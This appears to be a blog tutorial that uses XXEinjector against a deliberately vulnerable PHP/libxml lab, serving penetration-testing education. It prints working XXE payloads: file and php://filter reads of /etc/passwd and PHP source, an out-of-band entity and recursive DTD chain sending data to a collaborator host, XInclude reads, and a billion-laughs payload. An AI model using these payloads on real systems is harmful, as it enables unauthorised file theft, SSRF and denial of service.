TechEarl

XXEinjector Tutorial: Exploiting a Vulnerable App End to End

A complete XXEinjector walkthrough against a deliberately vulnerable PHP/libxml app: in-band file read, PHP filter source disclosure, blind out-of-band exfil, XInclude, and the textbook recursive-PE chain that no longer fires on libxml 2.9.14.

By Ishan Karunaratne · 12 min read

This is the walkthrough I wish I had when I first reached for XXEinjector. We start from a fresh state, point the Ruby tool at a vulnerable XML endpoint, and walk every primitive the tool exposes: in-band file read, PHP filter source disclosure, blind out-of-band exfil, plus the manual XInclude and billion-laughs payloads that sit outside XXEinjector's wheelhouse but belong in the same article. Every step is reproducible against a small Docker lab I publish for this exact purpose.

If you have not read the XML External Entity deep dive yet, do that first; this article assumes the parser flags and the entity grammar are familiar. The XXEinjector cheat sheet is the flag-by-flag reference that complements this walkthrough, and the best XXE tools list for 2026 covers where XXEinjector sits relative to manual curl and the Burp extensions.

A note on the output you will see. Every example below was produced against techearl-labs/xml-external-entity/xxe-basic on the pinned PHP 8.2 + libxml 2.9.14 image. The endpoints, the parser configuration, and the failure modes are deterministic and will match what you get locally. A few outputs are environment-dependent and will differ in minor ways: the IP address the collaborator logs for the lab container (a Docker bridge address, e.g. 172.27.0.3), the exact /etc/passwd contents inside the PHP container (whatever the base image ships), XXEinjector's own log timestamps, and the path it writes the captured loot to under Logs/. Treat those values as illustrative; the structure underneath is what to follow.

The lab target

Pull and run the lab:

bash
git clone https://github.com/ishankaru/techearl-labs.git
cd techearl-labs
docker compose up xxe-basic

The target listens on http://localhost:8086. There are two endpoints, both backed by the same unsafe parser (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, plus an explicit $dom->xinclude() call):

Endpoint | Method | Behaviour
/import.php | POST | Parses the XML body, echoes every <name> element back into the HTML response. In-band XXE, XInclude, and the billion-laughs mitigation all live here.
/upload-blind.php | POST | Same parser, response hard-wired to OK or Error. No content reflects back. This is the realistic shape of a backend XML processor.

A second container, xxe-basic-collab, runs a tiny Python HTTP server on the Docker network. It has no published port (only the sibling lab container can reach it) and logs every incoming request line to stdout. Tail it in a second terminal before starting:

bash
docker compose logs -f xxe-basic-collab

That log is the side channel for every blind exfil attempt in this article. If you do not see lines appear there, the attack did not fire.
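For readers who want to see how little a collaborator needs to do, here is a minimal sketch of a request-logging HTTP server. It is not the lab's actual collaborator code; the names format_line, CollabHandler, and serve are hypothetical, and the log shape is copied from the collaborator output quoted later in this article.

```python
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def format_line(client_ip: str, path: str) -> str:
    """Render one log line in the shape the collaborator output uses."""
    return f"[collab] GET from {client_ip} path={path}"


class CollabHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        # Log first, then answer with an empty 200 so the parser moves on.
        print(format_line(self.client_address[0], self.path), flush=True)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format: str, *args) -> None:
        # Suppress the default access log; format_line() is the only output.
        pass


def serve(port: int = 80) -> None:
    """Block forever, logging every GET request that arrives."""
    ThreadingHTTPServer(("0.0.0.0", port), CollabHandler).serve_forever()
```

Calling serve(8000) on a host the target can reach gives you the same side channel outside the lab; the port number is an arbitrary choice.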

Step 1: install XXEinjector

XXEinjector is a single Ruby script. Either clone the repo or grab the file:

bash
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
ruby XXEinjector.rb --help

The tool needs a recent Ruby (2.7+ is fine, anything in the 3.x range works). If --help prints, you are done. No gems, no virtualenv.

Step 2: build the request template

XXEinjector works from a captured HTTP request with an XXEINJECT marker where it should splice each payload. Save the file as req.txt:

code
POST /import.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT

Content-Length: 0 is fine; XXEinjector recalculates it for every request before sending. The marker has to be on its own line, in the body, exactly XXEINJECT. No surrounding XML scaffolding (the tool builds that for you).

For the blind endpoint you build a second template, identical apart from the path:

code
POST /upload-blind.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT

Save that as req-blind.txt. Both files sit next to where you run the tool.
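To make the template mechanics concrete, the following is a rough sketch of the splice-and-recount step described above. It is an illustration of the idea, not XXEinjector's own Ruby code; build_request is a hypothetical helper name.

```python
MARKER = "XXEINJECT"


def build_request(template: str, payload: str) -> bytes:
    """Splice payload at the marker and recompute Content-Length."""
    # Split headers from body at the first blank line.
    head, sep, body = template.replace("\r\n", "\n").partition("\n\n")
    if not sep or MARKER not in body:
        raise ValueError("template needs a blank line and an XXEINJECT marker in the body")

    body_bytes = body.replace(MARKER, payload).strip("\n").encode("utf-8")

    # Drop the placeholder Content-Length and append the real one.
    headers = [
        line for line in head.split("\n")
        if not line.lower().startswith("content-length:")
    ]
    headers.append(f"Content-Length: {len(body_bytes)}")
    return "\r\n".join(headers).encode("ascii") + b"\r\n\r\n" + body_bytes
```

This is why the placeholder value in the template does not matter: the header is rebuilt from the final body on every request.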

Step 3: classic in-band file read

The in-band primitive is the one XXEinjector was originally written for: declare an external entity, reference it where the application echoes content back, and let the response do the exfil. The lab's /import.php is exactly that shape.

bash
ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/etc/passwd \
  --direct=YES \
  --verbose

What each flag does:

  • --host=127.0.0.1 is the address of the attacker's listener. We are not using the listener for this scenario (this is in-band), but XXEinjector requires the flag.
  • --file=req.txt is the request template from Step 2.
  • --path=/etc/passwd is the file on the target's filesystem to read.
  • --direct=YES tells the tool to use a direct entity reference (<!ENTITY xxe SYSTEM "file://...">) rather than the parameter-entity OOB chain (covered in Step 6, and broken on this libxml).
  • --verbose prints the payload it sends and the response it gets, which is the only way to learn how the tool reasons.

Output (abbreviated):

code
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] File found:
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[+] Saved to: Logs/127.0.0.1/_etc_passwd

XXEinjector finds the echoed bytes in the response body, slices them out, writes them to Logs/<host>/<sanitised-path>, and prints them inline when --verbose is on. The file is on your disk now.

A useful sanity check before troubleshooting: confirm the lab echoes <name> content by hand:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<bookmarks>
  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>
XML

If the response contains the container's hostname inside a <strong>, the in-band primitive works and XXEinjector should succeed. If it does not, fix the manual case before re-running the tool.
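The same check can be scripted. The sketch below builds the payload used in the curl example, pulls reflected values out of <strong> tags, and derives the loot path. The helper names are hypothetical, and the path rule (slashes replaced by underscores) is an assumption inferred from the two log paths shown in this article, not taken from XXEinjector's source.

```python
import html
import re


def in_band_payload(path: str) -> str:
    """Build the in-band payload in the shape the lab's /import.php expects."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        "<bookmarks>\n"
        "  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>\n"
        "</bookmarks>\n"
    )


def reflected_names(response_html: str) -> list[str]:
    """Return the text of every <strong> element, HTML-unescaped and trimmed."""
    found = re.findall(r"<strong>(.*?)</strong>", response_html, flags=re.S)
    return [html.unescape(item).strip() for item in found]


def loot_path(host: str, path: str) -> str:
    """Assumed sanitisation rule: '/' becomes '_' under Logs/<host>/."""
    return f"Logs/{host}/{path.replace('/', '_')}"
```

POST the result of in_band_payload("/etc/hostname") with any HTTP client and feed the response body to reflected_names; an empty list means the manual case needs fixing first.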

Step 4: PHP filter source disclosure

file:// reads files as bytes and hands them to the parser as entity content. That is fine for plain-text files, but PHP source rarely survives the trip: the <?php opening tag, stray < and & characters, and unbalanced markup are not well-formed XML, so libxml either raises a parse error or returns a mangled fragment instead of the file. Nothing executes the script here; a file:// read never touches the PHP engine. The classic trick is to wrap the path in php://filter/convert.base64-encode/, which routes the read through PHP's stream filter machinery and hands the parser base64 text, which is always XML-safe.

XXEinjector has a built-in shortcut for exactly this:

bash
ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/var/www/html/import.php \
  --direct=YES \
  --phpfilter \
  --verbose

--phpfilter rewrites the entity URL from file:///var/www/html/import.php to php://filter/convert.base64-encode/resource=/var/www/html/import.php. The lab echoes the base64 blob back inside a <strong> tag, XXEinjector grabs it, decodes, and writes the actual PHP source.

Output (abbreviated):

code
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM
  "php://filter/convert.base64-encode/resource=/var/www/html/import.php">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] Base64-decoded and saved to: Logs/127.0.0.1/_var_www_html_import.php

cat the file and you get the PHP source of the endpoint you just exploited. In a real engagement this is where you walk the codebase off the box looking for credentials, config files, second-order vulnerabilities, and any other entrypoints the same parser handles. The shortlist is application-specific: wp-config.php, .env, framework bootstrap files, anything in the application's config/ directory.
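If you are driving the php://filter read by hand rather than through --phpfilter, the two moving parts are the URL rewrite and the decode. A minimal sketch, with hypothetical helper names:

```python
import base64


def phpfilter_url(path: str) -> str:
    """Wrap a filesystem path in the base64-encoding PHP stream filter."""
    return f"php://filter/convert.base64-encode/resource={path}"


def decode_blob(blob: str) -> bytes:
    """Decode a reflected base64 blob, tolerating whitespace added by the page."""
    compact = "".join(blob.split())
    # validate=True raises on stray non-base64 characters instead of skipping them.
    return base64.b64decode(compact, validate=True)
```

Stripping whitespace before decoding matters when the application wraps or indents the reflected value; strict validation then tells you quickly if you sliced the wrong part of the response.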

Step 5: blind out-of-band exfil with a direct external entity

/upload-blind.php returns only OK or Error and never reflects parsed content, so the in-band approach above will never work there. The realistic primitive is to make libxml issue an outbound HTTP request when it resolves an entity, encode the bit you care about into the URL, and read it out of the collaborator log.

XXEinjector has a built-in HTTP listener (--oob=http) but the only port the lab container can reach is the collaborator's port 80 inside the Docker network. Easier to use what is already there:

bash
ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --direct=YES \
  --path=/etc/hostname \
  --verbose

--host=xxe-basic-collab tells XXEinjector to point the SYSTEM URL at the collaborator hostname (which the lab container resolves over the Docker bridge). --oob=http selects the HTTP OOB mode, --direct=YES keeps the entity declaration inline rather than chaining through an external DTD.

In practice, because XXEinjector is not acting as its own listener in this lab, the cleanest demo is to send the same payload by hand with curl and watch the collaborator log. The payload has the shape the tool generates, so what you learn here carries over to targets where XXEinjector can host the listener itself:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
XML

Response from the lab: OK. Response in the collaborator tail:

code
[collab] GET from 172.27.0.3 path=/?leak=fired

The OOB primitive fires. The endpoint reflected nothing, but the parser still made an outbound HTTP request when it resolved &exfil;, and the collaborator received it. Anything you can put into that query string (a static token, a per-victim id, a hostname) lands in the log.
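Once more than a handful of callbacks arrive, it helps to parse the collaborator log instead of reading it by eye. The sketch below assumes the log line shape shown above; parse_collab_line is a hypothetical helper, and the container-name prefix in the usage test is an assumption about how docker compose prints log lines.

```python
import re
from urllib.parse import parse_qs, urlsplit

# search() rather than match(), so any prefix added by the log viewer is tolerated.
LOG_LINE = re.compile(
    r"\[collab\] (?P<method>[A-Z]+) from (?P<ip>\S+) path=(?P<path>\S+)"
)


def parse_collab_line(line: str):
    """Return method, source IP, path, and query parameters, or None if no match."""
    match = LOG_LINE.search(line)
    if match is None:
        return None
    target = urlsplit(match["path"])
    return {
        "method": match["method"],
        "ip": match["ip"],
        "path": target.path,
        "params": parse_qs(target.query),
    }
```

Keying on the query parameters is what lets a per-target token in the URL map a callback back to the request that caused it.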

Step 6: why the textbook recursive-PE chain fails here

Every classic XXE write-up demonstrates blind file-content exfil with a recursive parameter-entity chain in an external DTD. XXEinjector implements exactly this pattern when you drop --direct=YES and let it host its own evil.dtd:

bash
ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --path=/etc/passwd \
  --verbose

The payload XXEinjector builds is shaped like:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<foo>x</foo>

evil.dtd declares a parameter entity %file that reads /etc/passwd, an %eval that defines %exfil whose SYSTEM URL embeds %file; in the query string, then forces %exfil; to resolve so the file contents leave in the outbound URL.
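For reference, the textbook form of that DTD can be generated as follows. This is the generic chain found in XXE write-ups, not necessarily the exact bytes XXEinjector serves; recursive_pe_dtd and the p query parameter are hypothetical names chosen for the sketch.

```python
def recursive_pe_dtd(target_file: str, collab_base: str) -> str:
    """Build the classic three-stage parameter-entity exfil DTD."""
    return (
        # Stage 1: %file; holds the contents of the target file.
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        # Stage 2: %eval; expands to a declaration of %exfil;. The inner percent
        # sign is written as &#x25; so it is only interpreted on expansion.
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{collab_base}/?p=%file;\'>">\n'
        "%eval;\n"
        # Stage 3: resolving %exfil; triggers the outbound request.
        "%exfil;\n"
    )
```

The second stage is the part that matters for the rest of this step: it defines a new entity from inside another entity's expansion.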

Against the lab's libxml 2.9.14 the chain does not fire end-to-end. What you will see in the collaborator log:

code
[collab] GET from 172.27.0.3 path=/evil.dtd

One line. The external DTD loads. The second-stage %exfil; GET that should carry the file contents never appears. libxml has tightened parameter-entity processing across the 2.9.x series and now refuses to define a new entity inside the expansion of another entity loaded from an external DTD, which is the exact mechanic the recursive-PE pattern depends on. This is current 2026 behaviour on a stock PHP 8.2 image, not a quirk of one Docker tag.

What that means for XXEinjector specifically:

  • The OOB primitive in Step 5 still works. The parser does issue outbound requests for direct external entities.
  • The recursive-PE file-content exfil that XXEinjector defaults to does not work against this parser version. You will see the initial DTD fetch and nothing else.
  • The tool has no built-in fallback. It waits, decides nothing came back, and exits without loot.

This is not a bug in XXEinjector; it is libxml hardening eroding the technique the tool was designed around. On older parsers (anything before the 2.9.11-ish window where the PE restrictions tightened), and on differently-configured parsers (Java with XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true and no extra hardening, .NET Framework before 4.5.2, Python lxml with resolve_entities=True when it is built against an older libxml2), the recursive-PE chain still works exactly the way XXEinjector expects. Go's encoding/xml is not on that list: it does not load external DTDs or resolve external entities at all. Test the chain manually against the target before assuming the tool is broken; if the initial DTD fetch hits your collaborator and nothing else does, you are looking at the same libxml ceiling. The blind XXE OOB techniques article walks the parser-by-parser matrix.
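The triage rule in that last paragraph is simple enough to encode. A small sketch, assuming you have already collected the request paths from the collaborator log; classify_chain and its three labels are hypothetical:

```python
def classify_chain(paths: list[str], dtd_path: str = "/evil.dtd") -> str:
    """Classify an OOB attempt from the request paths the collaborator saw."""
    # Compare on the path only, ignoring any query string.
    bare = [p.split("?", 1)[0] for p in paths]
    dtd_hits = [p for p in bare if p == dtd_path]
    other_hits = [p for p in bare if p != dtd_path]

    if not dtd_hits:
        return "no-dtd-fetch"   # parser never loaded the external DTD
    if not other_hits:
        return "dtd-only"       # DTD loaded, second stage suppressed
    return "chain-fired"        # second-stage request arrived
```

A "dtd-only" result is the signature described above: outbound access works, but the parser refuses the second-stage entity definition.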

Step 7: XInclude (no DOCTYPE, no entity declaration)

XInclude is a separate libxml feature, opt-in, and entirely independent of entity processing. The lab calls $dom->xinclude() on the parsed document, which expands <xi:include> nodes in place. XXEinjector does not generate XInclude payloads (it is an entity-focused tool), so this step is manual curl:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
  <bookmark>
    <name><xi:include href="file:///etc/hostname" parse="text"/></name>
    <url>http://x</url>
  </bookmark>
</bookmarks>
XML

The response includes the container's hostname inside the <strong> of the bookmark. No DOCTYPE, no <!ENTITY> declaration. The XInclude path is often missed by audits that only grep for inline DTDs, and disabling external entities does not disable XInclude. The XInclude attacks article covers the other half of the surface (recursive includes, intra-document includes that surface authentication cookies, the difference between parse="xml" and parse="text").
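Because XXEinjector will not build this payload for you, a small generator is handy when testing several paths. The sketch below uses only the standard library and mirrors the element names from the curl example; xinclude_payload is a hypothetical helper.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"


def xinclude_payload(href: str) -> str:
    """Build a bookmarks document whose <name> contains an xi:include."""
    ET.register_namespace("xi", XI_NS)
    root = ET.Element("bookmarks")
    bookmark = ET.SubElement(root, "bookmark")
    name = ET.SubElement(bookmark, "name")
    # parse="text" asks the processor to inline the target as plain text.
    ET.SubElement(name, f"{{{XI_NS}}}include", {"href": href, "parse": "text"})
    ET.SubElement(bookmark, "url").text = "http://x"
    return '<?xml version="1.0"?>\n' + ET.tostring(root, encoding="unicode")
```

Building the document through ElementTree rather than string formatting means the href is attribute-escaped for you, which matters once paths contain ampersands or quotes.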

Step 8: billion laughs (the default mitigation in action)

The classic entity-expansion DoS, included here to show what the default libxml configuration actually catches. POST the nested payload at /import.php:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<bookmarks>
  <bookmark><name>&lol6;</name><url>http://x</url></bookmark>
</bookmarks>
XML

Response: XML parse error with a libxml diagnostic about the entity-expansion limit. Container CPU and memory stay flat. The lab demonstrates the attack and the default mitigation that already blocks it: libxml refuses to expand the document past its built-in limit. Passing LIBXML_PARSEHUGE to loadXML would disable that limit; the lab does not pass it, which is also why a real-world audit should grep for LIBXML_PARSEHUGE and LIBXML_NOENT together. The billion laughs attack article covers the variants (quadratic blowup, external-entity-based amplification) that get around expansion counters which only look at internal entity references.
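To see why the parser objects, compare the size of the document with the size of what it expands to. The sketch below regenerates the DOCTYPE from the curl example and computes the expansion arithmetically; both function names are hypothetical.

```python
def expanded_length(base: str = "lol", fanout: int = 10, levels: int = 5) -> int:
    """Length of the fully expanded top entity: len(base) * fanout ** levels."""
    return len(base) * fanout ** levels


def laughs_doctype(levels: int = 5, fanout: int = 10, base: str = "lol") -> str:
    """Build the nested-entity DOCTYPE; levels=5 yields lol2 through lol6."""
    lines = ["<!DOCTYPE lolz [", f'  <!ENTITY lol "{base}">']
    prev = "lol"
    for index in range(2, levels + 2):
        name = f"lol{index}"
        refs = f"&{prev};" * fanout
        lines.append(f'  <!ENTITY {name} "{refs}">')
        prev = name
    lines.append("]>")
    return "\n".join(lines)
```

With the defaults, a DOCTYPE of a few hundred bytes expands to 3 x 10^5 = 300,000 characters, and each extra level multiplies that by ten. That ratio between input size and expanded size is the kind of signal an expansion limit can act on.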

Step 9: session and re-runs

XXEinjector writes everything it captures to Logs/<host>/. Re-running with the same --path overwrites the existing log entry; re-running with a different --path adds a new file. The tool has no session cache the way sqlmap does, so every run re-sends the full request, which is fine for XXE (a single round trip per file) but worth noting if you script bulk extraction across many paths.

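For bulk reads, XXEinjector's --brute=/path/to/wordlist flag loops over a list of file paths using the same payload shape. That is useful when you have one entity primitive and want to walk a known config-file list. --enumports is a different feature: it probes which outbound ports the target can reach for the reverse connection, not which files exist.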
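When you want per-path control that a single wordlist run does not give you (for example, adding --phpfilter only for PHP files), a thin wrapper that plans one invocation per path is enough. This sketch only builds argument lists from flags already used in this article; the helper names and the .php rule are assumptions.

```python
def xxeinjector_argv(path: str, template: str = "req.txt", host: str = "127.0.0.1") -> list[str]:
    """Build one XXEinjector command line for an in-band read of path."""
    argv = [
        "ruby", "XXEinjector.rb",
        f"--host={host}",
        f"--file={template}",
        f"--path={path}",
        "--direct=YES",
    ]
    if path.endswith(".php"):
        # PHP source needs the base64 filter to come back intact.
        argv.append("--phpfilter")
    return argv


def plan_runs(wordlist_text: str) -> list[list[str]]:
    """One argv per non-empty, non-comment line of the wordlist."""
    paths = [line.strip() for line in wordlist_text.splitlines()]
    return [xxeinjector_argv(p) for p in paths if p and not p.startswith("#")]
```

Each list can be passed to subprocess.run from the XXEinjector directory; since the tool keeps no session state, the runs are independent and can be retried individually.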

What I would do next on this target

In a real engagement, once the steps above are done, the report writes itself:

  1. Confirm in-band XXE on /import.php, multiple file-read primitives available (file://, php://filter).
  2. Confirm PHP source disclosure via php://filter/convert.base64-encode/ on every file the application user can read.
  3. Confirm blind OOB on /upload-blind.php via direct external entity (SSRF primitive: outbound HTTP from the application container to anywhere libxml can reach).
  4. Confirm XInclude on /import.php as an alternative file-read path independent of entity hardening.
  5. Note that the textbook recursive-PE file-content exfil does not fire against this parser version (libxml 2.9.14), but the OOB primitive remains.
  6. Recommend: never set LIBXML_NOENT; pass LIBXML_NONET to block network resolution; disable XInclude by not calling $dom->xinclude(); reject any XML body containing a DOCTYPE declaration at the application layer; and run the XML processor in a container with no outbound network access.
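The application-layer DOCTYPE rejection in the last recommendation can be sketched as a pre-parse gate. The lab itself is PHP; this Python version only illustrates the logic, and is_acceptable_xml_body is a hypothetical name. It is deliberately strict and is meant to sit in front of the parser flags, not replace them: it does not cover documents that declare an unusual ASCII-compatible encoding.

```python
def is_acceptable_xml_body(body: bytes) -> bool:
    """Return False for any body that could carry a DOCTYPE declaration."""
    # NUL bytes indicate UTF-16/UTF-32, which would hide the keyword
    # from a byte-level scan. Refuse rather than try to transcode.
    if b"\x00" in body:
        return False
    try:
        text = body.decode("utf-8")
    except UnicodeDecodeError:
        return False
    # XML keywords are case-sensitive, so an exact match is sufficient here.
    return "<!DOCTYPE" not in text
```

The check also rejects a harmless document that merely mentions the keyword inside a comment or CDATA section; for an import endpoint that trade-off is usually acceptable.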

The point of this walkthrough is the chain. Each primitive on its own looks small; the cumulative chain (file read, source disclosure, outbound SSRF, XInclude as the second-path file read) is what XXE means in practice for a real audit.


